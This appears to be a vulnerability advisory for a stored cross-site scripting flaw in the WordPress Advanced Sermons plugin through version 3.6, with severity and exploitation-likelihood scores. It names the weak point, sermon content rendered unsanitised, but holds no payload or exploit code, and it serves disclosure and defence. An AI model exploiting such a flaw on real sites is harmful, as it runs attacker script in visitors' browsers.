WP CodeUs Advanced Sermons is vulnerable to Stored Cross‑Site Scripting because it fails to neutralize user input before rendering it on the site. An attacker can embed malicious script code into sermon content, which will then execute in the browsers of any visitor who loads the affected page. This allows arbitrary client‑side code execution within the context of the website for those visitors.

The vulnerability applies to the WordPress Advanced Sermons plugin from any initial release up through version 3.6. Administrators or users who can add or edit sermon entries are able to inject malicious payloads that are then stored in the database and displayed to guests.

The CVSS base score of 6.5 indicates a medium severity. The EPSS score is less than 1 %, suggesting that exploitation is unlikely at present, and the vulnerability is not listed in CISA’s KEV catalog. The attack vector most likely requires the attacker to have the capability to submit or modify sermon content—typically an authenticated administrator or privileged user. Once the payload is stored, every visitor to the affected page will run the malicious script in their browsers. No other explicit prerequisites are stated, so the risk is contingent on the attacker’s ability to create or edit sermon entries.